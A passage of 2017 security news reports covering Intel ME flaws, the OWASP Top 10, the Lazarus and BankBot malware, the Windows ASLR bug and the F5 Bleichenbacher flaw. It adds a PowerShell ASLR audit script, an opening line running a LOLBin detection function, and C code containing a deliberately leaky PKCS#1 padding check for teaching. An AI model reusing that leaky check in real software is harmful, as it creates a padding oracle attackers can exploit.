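$SampleEvents | ForEach-Object { Test-CobaltStyleLolbin -Event $_ } | Where-Object { $_ }
```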

Intel Chip Flaws Expose Millions of Devices to Attacks
21.11.2017 securityweek
Intel has conducted an in-depth security review of its Management Engine (ME), Trusted Execution Engine (TXE) and Server Platform Services (SPS) technologies and discovered several vulnerabilities. The company has released firmware updates, but it could take some time until they reach the millions of devices exposed to attacks due to these flaws.

Intel’s ME solution, which some members of the industry have classified as a backdoor, allows users to remotely manage computers via the Intel Active Management Technology (AMT).

Earlier this year, Embedi researchers discovered a critical privilege escalation vulnerability affecting AMT and some related services, specifically Small Business Technology (SBT) and Standard Manageability. Positive Technologies has also reported finding some potentially serious flaws in ME.

As a result of these findings, Intel has decided to perform a comprehensive security audit of ME, along with two other products. These are TXE, which is designed to ensure that a platform and its operating system are authentic and the OS is running in a trusted environment, and SPS, which allows remote server management.

The review led to the discovery of seven vulnerabilities that can be exploited to impersonate the ME, SPS and TXE services and impact the validity of local security feature attestation, execute arbitrary code without being detected by the user or the operating system, and crash the system or make it unstable.

One of the high severity flaws described in Intel’s advisory, CVE-2017-5705, is a local code execution issue found by Positive Technologies in ME.

According to Intel, ME is also affected by buffer overflows and other types of vulnerabilities that can be exploited for privilege escalation (CVE-2017-5708), local code execution (CVE-2017-5711), and remote code execution (CVE-2017-5712).

The kernel of Intel SPS is impacted by a couple of high severity flaws that can be exploited for local code execution (CVE-2017-5706), and gaining access to privileged content (CVE-2017-5709).

As for TXE, the tech giant discovered privilege escalation (CVE-2017-5710) and local code execution (CVE-2017-5707) vulnerabilities that have also been rated high severity.

Intel has not made public any details about the vulnerabilities, but Google security expert Matthew Garrett has shared some thoughts on the possible impact and concluded that the flaws are unlikely to be harmless.

Systems using ME firmware versions 11.0, 11.5, 11.6, 11.7, 11.10 and 11.20, SPS version 4.0, and TXE version 3.0 are impacted. The list of affected products includes some Core, Xeon, Atom, Pentium and Celeron processors, which are found in millions of devices.

Intel has released firmware updates that patch the vulnerabilities, along with a tool that allows users to see if their systems are affected. The company has advised customers to check their system OEM's website for the firmware updates, but, for the time being, only Lenovo appears to have released them.

Final Version of 2017 OWASP Top 10 Released
21.11.2017 securityweek
The final version of the 2017 OWASP Top 10 was released on Monday, and some types of vulnerabilities that no longer represent a serious risk have been replaced with issues that are more likely to pose a significant threat.

The Open Web Application Security Project (OWASP) announced the first release candidate for the 2017 OWASP Top 10 back in April, and there has been a lot of debate about what should and what should not be included.

One significant change compared to the 2013 OWASP Top 10 is the fact that the types of flaws that made it into the 2017 list have been selected based on the risk they pose.

The OWASP Top 10 vulnerabilities are injection, broken authentication, sensitive data exposure, XML external entity (XXE), broken access control, security misconfiguration, cross-site scripting (XSS), insecure deserialization, using components with known vulnerabilities, and insufficient logging and monitoring.

OWASP top 10 2017

While XSS can be classified as a type of injection, the decision has been made to leave it in a separate category as these types of bugs are addressed differently compared to SQL and OS command injections.

Cross-site request forgery (CSRF) has been removed from the OWASP Top 10 as modern development frameworks ensure that such vulnerabilities are avoided, which has led to CSRF being found in less than 5% of applications. Unvalidated redirects and forwards have also been removed as they affect only around 8% of apps.

Insecure direct object references (IDOR) and missing function level access control have been merged into broken access control.

The free spots were filled by XXE, insecure deserialization, and insufficient logging and monitoring. Critical deserialization flaws have been found in several high-profile apps in the past few years, so it’s not surprising that it made the list. As for logging and monitoring, OWASP pointed out that many organizations have serious problems in this department, as clearly demonstrated by the significant number of breaches discovered by third parties instead of the targeted organization itself.

OWASP also noted that while the names of some categories have not changed, the types of issues they cover have changed. For instance, sensitive data exposure refers to privacy and personal information exposure, not leaky headers and stack traces, and misconfigurations now also include cloud-related issues such as unprotected storage containers (e.g. AWS S3 buckets).

The 2017 OWASP Top 10 is based on data from 23 contributors covering more than 114,000 applications. The data has been made available on GitHub, a move that is part of OWASP’s efforts to be more transparent.

After a break, OWASP will start working on the next Top 10, which has been scheduled for 2020.

U.S. Charges Iranian Over 'Game of Thrones' HBO Hack
21.11.2017 securityweek BigBrothers
The United States on Tuesday charged an Iranian computer whiz with hacking into HBO, stealing scripts and plot summaries for "Game of Thrones," and trying to extort $6 million in Bitcoin out of the network.

US prosecutors in New York unveiled a seven-count indictment against Behzad Mesri, whom they identified as an Iran-based hacker who also goes by the name Skote Vahshat. Mesri is still at large, a spokesman for the US Attorney's office in Manhattan told AFP.

Mesri is accused of orchestrating a hack of HBO from May to August, then threatening to release stolen data unless the premium cable network paid a $6 million ransom in the digital currency Bitcoin.

US prosecutors say he stole scripts and plot summaries for then unaired episodes of the global smash hit "Game of Thrones" series, and unaired episodes for multiple other shows, including the "Curb Your Enthusiasm" comedy series.

He is accused of compromising multiple user accounts, and in July of sending an anonymous email to HBO personnel saying: "Hi to All losers! Yes it's true! HBO is hacked!... Beware of heart Attack!!!"

Mesri leaked some of the stolen data over the Internet onto websites he controlled, US federal prosecutors allege.

The Iranian suspect faces seven counts in the United States, including wire fraud, aggravated identity theft and four counts of computer fraud.

US prosecutors accuse Mesri of previously conducting computer attacks on behalf of the Iranian military that targeted nuclear software systems and Israeli infrastructure.

They also said he was a member of the Iranian-based Turk Black Hat Security hacking group, targeting hundreds of websites in the United States and around the world.

North Korean Hackers Target Android Users in South
21.11.2017 securityweek BigBrothers
At least two cybersecurity firms have noticed that the notorious Lazarus threat group, which many experts have linked to North Korea, has been using a new piece of Android malware to target smartphone users in South Korea.

Both McAfee and Palo Alto Networks published blog posts on Monday describing the latest campaign attributed to the threat actor also known as Hidden Cobra. The group is believed to be responsible for several high-profile attacks, including ones targeting Sony and financial institutions, and possibly even the recent WannaCry ransomware attack. Some of the operations tied to this group are Operation Blockbuster, Dark Seoul and Operation Troy.

The malware sample analyzed by McAfee, delivered as an APK file, has been designed to mimic a Korean bible app made available on Google Play by a developer named GODpeople. However, the malicious application did not make it onto the official app store and it’s unclear what method of distribution has been used.

“GodPeople is sympathetic to individuals from North Korea, helping to produce a movie about underground church groups in the North. Previous dealings with the Korean Information Security Agency on discoveries in the Korean peninsula have shown that religious groups are often the target of such activities in Korea,” explained McAfee’s Christiaan Beek and Raj Samani.

McAfee said the malware, which has been around since at least March, delivers a backdoor as an executable and linkable format (ELF) file. The backdoor allows hackers to collect information about the infected device, download and upload files, and execute commands. The list of command and control (C&C) servers used by the malware includes IP addresses previously linked to the Lazarus group.

Palo Alto Networks has not shared any information about the applications used to deliver the malware, but the company pointed out that the operation appears to be aimed at Samsung device users in South Korea.

The firm’s analysis started with a PE file uploaded to VirusTotal. This file is designed to deliver ELF ARM files and APK files from an HTTP server. The APK that represents the final payload provides backdoor capabilities and allows its operator to spy on the targeted user by recording audio via the microphone, capturing images via the camera, uploading and downloading files, harvesting GPS information, reading contacts, collecting SMS and MMS messages, recording browsing history, and capturing Wi-Fi information.

Palo Alto Networks has also found links between the malware and the Lazarus group, particularly to malware and infrastructure used in attacks on the SWIFT banking system and activities described in reports on Operation Blockbuster.

This is not the first time North Korea has reportedly targeted mobile users in the South. Back in 2014, South Korea’s National Intelligence Service said more than 20,000 smartphones had been infected that year with a piece of malware traced back to North Korea.

The reports from McAfee and Palo Alto Networks come less than a week after the U.S. Department of Homeland Security (DHS) published a report on a Hidden Cobra malware tracked as FALLCHILL.

Windows 8 and newer versions fail to properly implement ASLR
21.11.2017 securityaffairs Safety

The CERT/CC is warning that Address Space Layout Randomisation (ASLR) isn’t properly implemented in versions of Microsoft Windows 8 and newer.
The researcher Will Dormann from the Carnegie-Mellon CERT has discovered the Address Space Layout Randomisation (ASLR) isn’t properly implemented in versions of Microsoft Windows 8 and newer.

15 Nov

Matt Miller
Replying to @wdormann and 3 others
It is possible to enable bottom-up ASLR system-wide, but I'm not sure if it can be done via the WDEG UI, @markwo might know. Agree with your feedback here. I passed it on to the team.

Will Dormann
Actually, with Windows 7 and EMET System-wide ASLR, the loaded address for eqnedt32.exe is different on every reboot. But with Windows 10 with either EMET or WDEG, the base for eqnedt32.exe is 0x10000 EVERY TIME.
Conclusion: Win10 cannot enforce ASLR as well as Win7! pic.twitter.com/Jp10nqk1NQ

Address Space Layout Randomization (ASLR) is a security mechanism used by operating systems to randomize the memory addresses used by key areas of processes, making it hard for attackers to find the memory location where to inject their malicious code.

The Address Space Layout Randomisation is particularly effective against stack and heap overflows and is able to prevent arbitrary code execution triggered by any other buffer overflow vulnerability. The security measures are present in almost any modern operating system, including Windows, Linux, macOS, and Android.

Applications running on Windows 8 and newer versions were allocated addresses with zero entropy, which means that it was possible to predict where the code is allocated in memory because the randomisation failed. Windows 10 has the problem, too.

The CERT/CC published a security advisory late last. Dormann found the ASLR issue while he was analyzing a recently fixed bug in Microsoft’s equation editor, tracked as CVE-2017-11882, that could be exploited by remote attackers to install malware without user interaction.

“Microsoft Windows 8 introduced a change in how system-wide mandatory ASLR is implemented. This change requires system-wide bottom-up ASLR to be enabled for mandatory ASLR to receive entropy. Tools that enable system-wide ASLR without also setting bottom-up ASLR will fail to properly randomise executables that do not opt in to ASLR.” states the security advisory.

According to the CERT, the bug only affects applications using mandatory ASLR, while applications that used opt-in Address Space Layout Randomisation and that never used ASLR aren’t affected.

According to the CERT/CC the problem was introduced with Windows 8 with a change in the mandatory Address Space Layout Randomisation implementation.

“Starting with Windows 8, system-wide mandatory ASLR is implemented differently than with prior versions of Windows. With Windows 8 and newer, system-wide mandatory ASLR is implemented via the HKLM\System\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions binary registry value. The other change introduced with Windows 8 is that system-wide ASLR must have system-wide bottom-up ASLR enabled to supply entropy to mandatory ASLR.” continues the advisory.

The CERT explained that both EMET and Windows Defender Exploit Guard can enable mandatory Address Space Layout Randomisation for code that isn’t linked with the /DYNAMICBASE flag.

“Both EMET and Windows Defender Exploit Guard enable system-wide ASLR without also enabling system-wide bottom-up ASLR. Although Windows Defender Exploit guard does have a system-wide option for system-wide bottom-up-ASLR, the default GUI value of “On by default” does not reflect the underlying registry value (unset).” states the advisory.

“This causes programs without /DYNAMICBASE to get relocated, but without any entropy. The result of this is that such programs will be relocated, but to the same address every time across reboots and even across different systems.”

Address Space Layout Randomisation

16 Nov

Matt Miller
Replying to @wdormann
Set bit 15 (0x10000) in HKLM\System\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions (REG_QWORD). The WDEG team is looking at how to better support this from the UI.

Will Dormann
Or for those not proficient in setting bits in binary registry values (such as myself), either manually set the values indicated in this picture, or if you don't care about clobbering any existing system-wide mitigations, import this .REG file:https://gist.github.com/wdormann/43cffbf823b5c5da8682985ef31c16a9 … pic.twitter.com/i4YNpET0wq

Dormann explained that sysadmins can set a registry value to force bottom-up Address Space Layout Randomisation.

“The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workaround:
Enable system-wide bottom-up ASLR on systems that have system-wide mandatory ASLR

To enable both bottom-up ASLR and mandatory ASLR on a system-wide basis on a Windows 8 or newer system, the following registry value should be imported:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel]
"MitigationOptions"=hex:00,01,01,00,00,00,00,00,00,00,00,00,00,00,00,00”
concludes the CERT/CC.

A massive cyber attack hit the Algerian state telecom operator Algerie Telecom
21.11.2017 securityaffairs Cyber

The Algerian state telecom operator Algerie Telecom was hit by a series of cyber attacks aimed to hack and disrupt its system.
The Algerian state telecom operator Algerie Telecom confirmed on Friday that it was hit by a series of cyber attacks aimed to hack and disrupt its system.

The company was able to repel the attack and security services managed to identify and arrest the attackers.

At the time of writing, there are no further details about the attacks or the motivation of the hackers.

According to a statement issued by the company, its staff was able to protect the operational infrastructure with the help of security services.

Algerian state telecom operator Algerie Telecom

The rapid increase in the number of cyber attacks is raising concerns in Algeria especially over the security of recently launched services, such as the recently adopted e-payment system for electricity and water bills.

“Iman Houda Faraoun, Minister of Post, Information and Communication Technologies and Digital Economy, said the e-commerce bill, which had been approved by the Council of Ministers, will come into force as soon as it is approved by the parliament.” reported the Xinhuanet.com website.

“She promised that the e-commerce process will be fully protected, as e-financial transactions data, invoices and postal and bank cards will remain confidential.”

Secureworks Releases Open Source IDS Tools
21.11.2017 securityweek Security
Secureworks has released two open source tools, Flowsynth and Dalton, designed to help analysts test rules for intrusion detection systems (IDS) and intrusion prevention systems (IPS) such as Snort and Suricata.

Dalton allows users to quickly and easily run network packet capture (pcap) files against IDS/IPS engines using bespoke rules and/or existing rulesets.

Common use cases for Dalton include testing ruleset coverage, developing and troubleshooting signatures, testing configuration changes, testing variable changes, testing specific IDS engine behavior, and creating custom packet captures.

Dalton includes a controller component, which provides a web interface and an API for retrieving job results and communicating with agents. These agents, which represent the second component of the tool, run on IDS sensors and provide an interface between the controller and the IDS engine.

The second tool released as open source by Secureworks is Flowsynth, which complements Dalton by making it easier for users to quickly model network traffic and generate custom pcaps.

“Flowsynth rapidly models network traffic and generates libpcap-formatted packet captures. It leverages the Scapy packet manipulation tool, but Flowsynth's input is a text-based, structured intermediate language that is simple to create and understand. It allows for programmatic network flow definitions as well as ad hoc and custom network traffic creation,” Secureworks explained.

The Dalton controller includes a web-based user interface that connects the tool to Flowsynth and allows the created pcaps to be easily sent to Dalton for testing.

The documentation and examples provided by Secureworks are specifically made for Suricata and Snort, both of which are also open source.

The security firm says Dalton and Flowsynth are based on tools that its Counter Threat Unit research team has used internally for several years. “They have been so useful that Secureworks decided to make them available to the network IDS community,” the company said.

Windows 8 and Later Fail to Properly Apply ASLR
21.11.2017 securityweek Safety
Address Space Layout Randomization (ASLR) isn’t properly applied on versions of Microsoft Windows 8 and newer, an alert from Carnegie Mellon University-run CERT Coordination Center (CERT/CC) warns.

The issue is created by the tools that enable system-wide ASLR on newer Windows systems without also setting bottom-up ASLR, a vulnerability note explains.

Starting with Windows 8, system-wide bottom-up ASLR is required for mandatory ASLR to receive entropy, but executables that do not opt in to ASLR aren’t properly randomized if the tools that enable system-wide ASLR don’t also set bottom-up ASLR.

ASLR was introduced in Windows Vista to prevent code-reuse attacks by loading executable modules at non-predictable addresses. Because of this feature, attack methods relying on code being loaded to a predictable or discoverable location, such as return-oriented programming (ROP), were mitigated.

ASLR, however, requires that the code is linked with the /DYNAMICBASE flag to opt in to ASLR, which represents an implementation weakness, the vulnerability note from DHS-sponsored CERT/CC reveals.

To protect applications that don't opt in to using ASLR (or other exploit mitigation techniques), Microsoft released the Enhanced Mitigation Experience Toolkit (EMET), which allows users to specify both system-wide and application-specific mitigations on the system.

Thus, EMET acts as a front-end GUI for system-wide exploit mitigations built in to the Windows operating system. When it comes to application-specific mitigations, the EMET library is loaded into the process space of the applications to be protected.

Starting with the Windows 10 Fall Creators update, Microsoft made EMET native to the operating system by incorporating its capabilities into the Windows Defender Exploit Guard. Both EMET and Windows Defender Exploit Guard can enable mandatory ASLR on a per-application or system-wide basis.

Starting with Windows 8, system-wide mandatory ASLR is implemented via the HKLM\System\CurrentControlSet\Control\Session Manager\Kernel\MitigationOptions binary registry value and requires system-wide bottom-up ASLR enabled to supply entropy to mandatory ASLR.

“Both EMET and Windows Defender Exploit Guard enable system-wide ASLR without also enabling system-wide bottom-up ASLR. […] This causes programs without /DYNAMICBASE to get relocated, but without any entropy. The result of this is that such programs will be relocated, but to the same address every time across reboots and even across different systems,” CERT/CC explains.

Because of this issue, non-DYNAMICBASE applications are relocated to a predictable location on Windows 8 and newer systems that have system-wide ASLR enabled via either EMET or Windows Defender Exploit Guard. This also makes exploitation of the vulnerability easier in some instances.

The CERT team notes that no practical solution to the problem is known at the moment, but that enabling system-wide bottom-up ASLR on systems that have system-wide mandatory ASLR should mitigate the issue.

Importing the following registry value enables both bottom-up ASLR and mandatory ASLR on a system-wide basis on Windows 8 or newer systems:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\kernel]
"MitigationOptions"=hex:00,01,01,00,00,00,00,00,00,00,00,00,00,00,00,00

“Note that importing this registry value will overwrite any existing system-wide mitigations specified by this registry value. The bottom-up ASLR setting specifically is the second 01 in the binary string, while the mandatory ASLR setting is the first 01,” the CERT team notes.
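As an added example (not from the CERT/CC advisory or from either article on this page quoting it), the PowerShell below audits the MitigationOptions value described above and in the securityaffairs write-up earlier on this page: it reports the mandatory-ASLR-without-bottom-up-ASLR state and, if needed, sets only the bottom-up bit so that other system-wide mitigations already in the value are preserved rather than overwritten. The function names and the second, mandatory-only hex string are constructed; the byte positions are the advisory's "first 01" (0x100, mandatory ASLR) and "second 01" (0x10000, bottom-up ASLR), matching the PROCESS_CREATION_MITIGATION_POLICY bit layout.

```powershell
# Added example; not part of the CERT/CC advisory. Run in an elevated shell
# if you intend to change the value.
$KernelKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\kernel'
$ValueName = 'MitigationOptions'

# 16-byte little-endian value. Byte 1 bit 0 (0x100) is FORCE_RELOCATE_IMAGES
# (mandatory ASLR); byte 2 bit 0 (0x10000) is BOTTOM_UP_ASLR. These are the
# "first 01" and "second 01" in the advisory's hex string.
$MandatoryAslrByte = 1
$BottomUpAslrByte  = 2

function ConvertFrom-RegHex {
    # Parses a .reg "hex:00,01,01,..." string into a 16-byte array.
    param([Parameter(Mandatory)][string]$Hex)
    $buf   = New-Object byte[] 16
    $parts = ($Hex -replace '^hex:', '') -split ','
    for ($i = 0; $i -lt [Math]::Min($parts.Count, 16); $i++) {
        $buf[$i] = [Convert]::ToByte($parts[$i].Trim(), 16)
    }
    return ,$buf
}

function Get-MitigationOptionsBytes {
    # Reads the live value as 16 bytes. An unset value (what the WDEG UI shows
    # as "On by default") yields all zeros.
    $buf  = New-Object byte[] 16
    $item = Get-ItemProperty -Path $KernelKey -Name $ValueName -ErrorAction SilentlyContinue
    if ($item) {
        $raw = $item.$ValueName
        if ($raw -is [byte[]]) {
            [Array]::Copy($raw, $buf, [Math]::Min($raw.Length, 16))          # REG_BINARY
        } else {
            [Array]::Copy([BitConverter]::GetBytes([int64]$raw), $buf, 8)    # REG_QWORD
        }
    }
    return ,$buf
}

function Test-MitigationOptions {
    # Reports the misconfiguration the advisory describes: mandatory ASLR set
    # while bottom-up ASLR is not, so non-/DYNAMICBASE images are relocated to
    # the same address every time.
    param([byte[]]$Bytes = (Get-MitigationOptionsBytes))
    $mandatory = ($Bytes[$MandatoryAslrByte] -band 0x01) -ne 0
    $bottomUp  = ($Bytes[$BottomUpAslrByte]  -band 0x01) -ne 0
    [pscustomobject]@{
        MandatoryAslr   = $mandatory
        BottomUpAslr    = $bottomUp
        ZeroEntropyRisk = ($mandatory -and -not $bottomUp)
        Hex             = ($Bytes | ForEach-Object { $_.ToString('x2') }) -join ','
    }
}

function Enable-BottomUpAslr {
    # Sets only the bottom-up bit and writes all 16 bytes back, keeping every
    # other mitigation already present (importing the advisory's .reg file
    # overwrites them). The kernel reads the value at boot, so reboot afterwards.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    $bytes = Get-MitigationOptionsBytes
    if (($bytes[$BottomUpAslrByte] -band 0x01) -ne 0) { return 'already enabled' }
    $bytes[$BottomUpAslrByte] = $bytes[$BottomUpAslrByte] -bor 0x01
    if ($PSCmdlet.ShouldProcess("$KernelKey\$ValueName", 'Enable system-wide bottom-up ASLR')) {
        Set-ItemProperty -Path $KernelKey -Name $ValueName -Value $bytes -Type Binary
    }
    return 'enabled (reboot required)'
}

# The advisory's value (both bits set) reports no risk; the constructed
# mandatory-only value is the zero-entropy case the advisory warns about.
Test-MitigationOptions -Bytes (ConvertFrom-RegHex 'hex:00,01,01,00,00,00,00,00,00,00,00,00,00,00,00,00')
Test-MitigationOptions -Bytes (ConvertFrom-RegHex 'hex:00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00')

# Audit the running system (read-only); call Enable-BottomUpAslr -WhatIf to
# preview the change before applying it.
Test-MitigationOptions
```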

System-wide mandatory ASLR could cause issues on systems with older AMD/ATI video card drivers in use, but the problem was addressed in the Catalyst 12.6 drivers released in June, 2012.

Microsoft was notified of the vulnerability on November 16, the vulnerability note explains.

BankBot Returns On Play Store – A Never Ending Android Malware Story
20.11.2017 thehackernews  Android

Even after so many efforts by Google to keep its Play Store free of malware, shady apps have somehow managed to fool its anti-malware protections and infect people with malicious software.
A team of researchers from several security firms has uncovered two new malware campaigns targeting Google Play Store users, of which one spreads a new version of BankBot, a persistent family of banking Trojan that imitates real banking applications in efforts to steal users' login details.
BankBot has been designed to display fake overlays on legitimate bank apps from major banks around the world, including Citibank, WellsFargo, Chase, and DiBa, to steal sensitive information, including logins and credit card details.
With its primary purpose of displaying fake overlays, BankBot has the ability to perform a broad range of tasks, such as sending and intercepting SMS messages, making calls, tracking infected devices, and stealing contacts.
Google removed at least four previous versions of this banking trojan from its official Android app store platform earlier this year, but BankBot apps always made their ways to Play Store, targeting victims from major banks around the world.
The second campaign spotted by researchers not only spreads the same BankBot trojan as the first campaign but also Mazar and Red Alert. This campaign has been described in detail on ESET blog.
According to an analysis performed by the mobile threat intelligence team at Avast in collaboration with ESET and SfyLabs, the latest variant of BankBot has been hiding in Android apps that pose as supposedly trustworthy, innocent-looking flashlight apps.
First spotted by the researchers on 13 October, the malicious BankBot apps uses special techniques to circumvent Google's automated detection checks, such as starting malicious activities 2 hours after the user gave device admin rights to the app and publishing the apps under different developer names.
After tricking victims into downloading them, the malicious apps check for the applications that are installed on the infected device against a hard-coded, list of 160 mobile apps.
According to the researchers, this list includes apps from Wells Fargo and Chase in the U.S., Credit Agricole in France, Santander in Spain, Commerzbank in Germany and many other financial institutions from around the world.


If it finds one or more of those apps on the infected smartphone, the malware downloads and installs the BankBot APK from its command-and-control server and tries to trick the victim into granting it administrator rights by pretending to be a Play Store or system update, using a similar icon and package name.
Once it has admin privileges, the BankBot app displays an overlay on top of the legitimate app whenever the victim launches one of the apps from the malware's list, and steals whatever banking information the victim types into it.
Avast Threat Labs has also provided a video demonstration of this mechanism, tested with the app of the Czech bank Airbank. You can see how the malware creates an overlay within milliseconds and tricks the user into handing their bank details to criminals.
Since many banks use two-factor authentication for secure transactions, BankBot includes functionality that lets it intercept text messages, allowing the criminals behind BankBot to steal the mobile transaction number (mTAN) sent to the customer's phone and transfer money to their own accounts.
One important thing to note is that Android blocks app installation from outside the Play Store. Even if you have already permitted installation from unknown sources, Google still requires you to press a button to continue such installations.
"Unlike this newer version of BankBot, droppers from previous campaigns were far more sophisticated," the researchers note. "They applied techniques such as performing clicks in the background via an Accessibility Service to enable the installation from unknown sources."
The latest BankBot version does not use the Accessibility Service because Google recently blocked this feature for all applications except those designed to provide services for the blind.
Google has already removed all recently-discovered BankBot apps after being notified by the researchers.
Although it is a never-ending concern, the best way to protect yourself is to remain vigilant when downloading apps, even from Google's official Play Store. Always check an app's permissions and reviews before installing it from Google Play.
Even though the BankBot apps made their way into the Play Store, their payload was downloaded from an external source. So, don't allow any unknown third-party APK to be installed on your smartphone.
To do so, go to Settings → Security and turn off "Allow installation of apps from sources other than the Play Store."
Most importantly, be careful which apps you grant administrative rights to, as those rights are powerful and can give an app full control of your device.

Flaw in F5 Products Allows Recovery of Encrypted Data
20.11.2017 securityweek
A crypto vulnerability affecting some F5 Networks products can be exploited by a remote attacker for recovering encrypted data and launching man-in-the-middle (MitM) attacks, the company told customers on Friday.

The impacted products are part of F5’s BIG-IP application delivery platform, including security, traffic management and performance services such as LTM, AAM, AFM, Analytics, APM, ASM, DNS, GTM, Link Controller, and PEM. The flaw also affects the F5 WebSafe anti-fraud solution.

According to F5, the vulnerability exposes virtual servers configured with a Client SSL profile and RSA key exchange enabled to adaptive chosen-ciphertext attacks, also known as Bleichenbacher attacks. Launching an attack against a TLS session established using an RSA key exchange allows a remote hacker to recover plaintext data and launch MitM attacks, even if they don’t have access to the server’s private key.

Nick Sullivan, cryptography expert at Cloudflare, pointed out that the vulnerability is similar to the notorious DROWN bug, which allows an attacker to decrypt TLS communications when SSLv2 is used. However, he said the F5 bug is worse as the SSLv2 requirement is eliminated.

“Note that you don’t need to have the private key to decrypt non-FS [forward secrecy] TLS sessions. You only need to find a server using the key with a padding oracle,” Sullivan said. “We should all be grateful for the people in the industry who successfully pushed for forward secrecy to be the default in HTTPS.”

The vulnerability is tracked as CVE-2017-6168 and it has been assigned a CVSS score of 9.1, which puts it in the critical severity category.

F5 has released updates that patch the security hole for each of the affected products. The company has also provided advice for partial or full mitigation, and pointed out that an attack is not easy to conduct.

“Exploiting this vulnerability to perform plaintext recovery of encrypted messages will, in most practical cases, allow an attacker to read the plaintext only after the session has completed,” F5 said in its advisory.

“Exploiting this vulnerability to conduct a MiTM attack requires the attacker to complete the initial attack, which may require millions of server requests, during the handshake phase of the targeted session within the window of the configured handshake timeout,” the company added. “This attack may be conducted against any TLS session using RSA signatures, but only if cipher suites using RSA key exchange are also enabled on the virtual server. The limited window of opportunity, limitations in bandwidth, and latency make this attack significantly more difficult to execute.”

The vendor said the highest risk is to virtual servers where the Generic Alert option, which is enabled by default, has been disabled. This is due to the fact that these systems report the specific handshake failure, which can be useful to the attacker, instead of a generic message.
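As an added illustration of why distinguishable handshake failures matter (this is example code, not F5's implementation or any part of its advisory), the following C compares a PKCS#1 v1.5 padding check that returns a different error for each failure mode with a constant-time check in the style RFC 5246 section 7.4.7.1 recommends: any failure silently substitutes a random premaster secret, so a peer cannot tell bad padding from good. The modulus size, the sample block and the fixed "random" fallback are constructed for the demo; real code would draw the fallback from a CSPRNG before the RSA operation.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define K_BYTES 128   /* modulus length of a constructed 1024-bit key */
#define PMS_LEN 48    /* TLS premaster secret length */

/* Leaky check: each failure mode yields a distinct code and exits at a different
 * point. If the server reports these as specific alerts (the non-generic alert
 * behaviour discussed above) or reaches them after measurably different work, a
 * peer learns "padding OK" versus "padding bad" for a chosen ciphertext. */
enum { PAD_OK = 0, ERR_HEADER = 1, ERR_NO_SEP = 2, ERR_SHORT_PAD = 3, ERR_LENGTH = 4 };

int unpad_pkcs1_v15_leaky(const uint8_t *em, unsigned k, uint8_t *pms_out)
{
    if (em[0] != 0x00 || em[1] != 0x02) return ERR_HEADER;
    unsigned i = 2;
    while (i < k && em[i] != 0x00) i++;          /* early exit: timing depends on input */
    if (i == k) return ERR_NO_SEP;
    if (i < 10) return ERR_SHORT_PAD;            /* PKCS#1 v1.5 needs >= 8 padding bytes */
    if (k - i - 1 != PMS_LEN) return ERR_LENGTH;
    memcpy(pms_out, em + i + 1, PMS_LEN);
    return PAD_OK;
}

/* Constant-time masks: all-ones when the condition holds, zero otherwise (inputs < 2^31). */
static unsigned ct_is_zero(unsigned x) { return 0u - ((x - 1u) >> 31); }
static unsigned ct_eq(unsigned a, unsigned b) { return ct_is_zero(a ^ b); }
static unsigned ct_lt(unsigned a, unsigned b) { return 0u - ((a - b) >> 31); }

/* Hardened check: no early exits, no error codes. On any failure the output is
 * replaced by the caller-supplied random premaster secret, so the handshake later
 * fails at Finished exactly as it would for a well-formed but wrong guess. The
 * caller must never send a padding-specific alert. */
void unpad_pkcs1_v15_ct(const uint8_t *em, unsigned k, const uint8_t *random_pms, uint8_t *pms_out)
{
    unsigned good = ct_eq(em[0], 0x00) & ct_eq(em[1], 0x02);
    unsigned found = 0, zero_index = 0;
    for (unsigned i = 2; i < k; i++) {
        unsigned is_zero = ct_is_zero(em[i]);
        zero_index |= i & (is_zero & ~found);    /* record the first 0x00 without branching */
        found |= is_zero;
    }
    good &= found;
    good &= ~ct_lt(zero_index, 10);              /* at least 8 non-zero padding bytes */
    good &= ct_eq(zero_index, k - PMS_LEN - 1);  /* payload is exactly 48 bytes */
    uint8_t g = (uint8_t)good;                   /* 0xFF or 0x00 */
    for (unsigned j = 0; j < PMS_LEN; j++)
        pms_out[j] = (uint8_t)((em[k - PMS_LEN + j] & g) | (random_pms[j] & (uint8_t)~g));
}

/* Build a well-formed block: 00 02 | 77 non-zero padding bytes | 00 | 48-byte PMS. */
void build_valid_em(uint8_t em[K_BYTES], const uint8_t pms[PMS_LEN])
{
    unsigned sep = K_BYTES - PMS_LEN - 1;        /* index 79 */
    em[0] = 0x00; em[1] = 0x02;
    for (unsigned i = 2; i < sep; i++) em[i] = (uint8_t)(0x41 + (i % 26));  /* constructed padding */
    em[sep] = 0x00;
    memcpy(em + sep + 1, pms, PMS_LEN);
}

/* Returns how many of the four claimed behaviours hold (4 = all). */
int self_check(void)
{
    uint8_t pms[PMS_LEN], fallback[PMS_LEN], em[K_BYTES], out[PMS_LEN];
    int passed = 0;
    for (unsigned j = 0; j < PMS_LEN; j++) { pms[j] = (uint8_t)(0xA0 + j); fallback[j] = 0x11; }
    build_valid_em(em, pms);
    passed += (unpad_pkcs1_v15_leaky(em, K_BYTES, out) == PAD_OK && memcmp(out, pms, PMS_LEN) == 0);
    unpad_pkcs1_v15_ct(em, K_BYTES, fallback, out);
    passed += (memcmp(out, pms, PMS_LEN) == 0);
    em[1] = 0x01;                                /* corrupt the header as a bad ciphertext would */
    passed += (unpad_pkcs1_v15_leaky(em, K_BYTES, out) == ERR_HEADER);   /* distinct, observable */
    unpad_pkcs1_v15_ct(em, K_BYTES, fallback, out);
    passed += (memcmp(out, fallback, PMS_LEN) == 0);  /* same shape of output as the valid case */
    return passed;
}

int main(void)
{
    printf("self_check: %d/4 behaviours confirmed\n", self_check());
    return 0;
}
```

The hardened function still computes a wrong key on bad input; what changes is that the wrongness surfaces only as a generic Finished failure, which is the same signal the attacker would get for any random guess. Disabling a generic alert, as the advisory describes, reintroduces the first function's behaviour at the protocol layer even when the padding code itself is constant-time.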

The security hole was reported to the vendor by Tripwire’s Craig Young, researcher Hanno Böck, and Juraj Somorovsky of Ruhr-Universität Bochum. It’s worth noting that Somorovsky was part of the team that first described the DROWN attack. Details of the vulnerability will be published at a later date.

